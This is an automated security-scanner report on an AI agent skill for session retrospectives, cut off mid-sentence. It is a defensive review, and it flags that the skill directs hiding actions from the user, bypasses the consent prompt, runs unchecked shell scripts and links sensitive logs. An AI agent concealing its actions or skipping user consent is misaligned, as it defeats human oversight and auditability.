retro

[Skill Scanner] Skill instructions include directives to hide actions from user The skill fragment presents a coherent internal tooling pattern for post-session retrospectives, with strong governance and multi-agent orchestration. It does not appear to contain malware or credentials, and the data flows are largely local and artifact-based. However, the complexity and broad script-based IO surface introduce operational risks (command execution risk, misconfigurations, and potential data leakage if paths are mishandled). Recommended improvements include explicit input sanitization, strict sandboxing for script invocations, clearer access controls, and explicit security review of all shell scripts and artifact write paths before production use. LLM verification: This SKILL.md appears to implement a plausible retrospective workflow and mostly aligns with its stated purpose. However, there are several concerning operational patterns: the skill runs local plugin shell scripts without integrity checks, it creates symlinks to potentially sensitive session logs, it allows sub-agents to perform web research and write arbitrary files, and it explicitly includes non-interactive fast-paths that bypass AskUserQuestion (reducing user consent/auditability). These de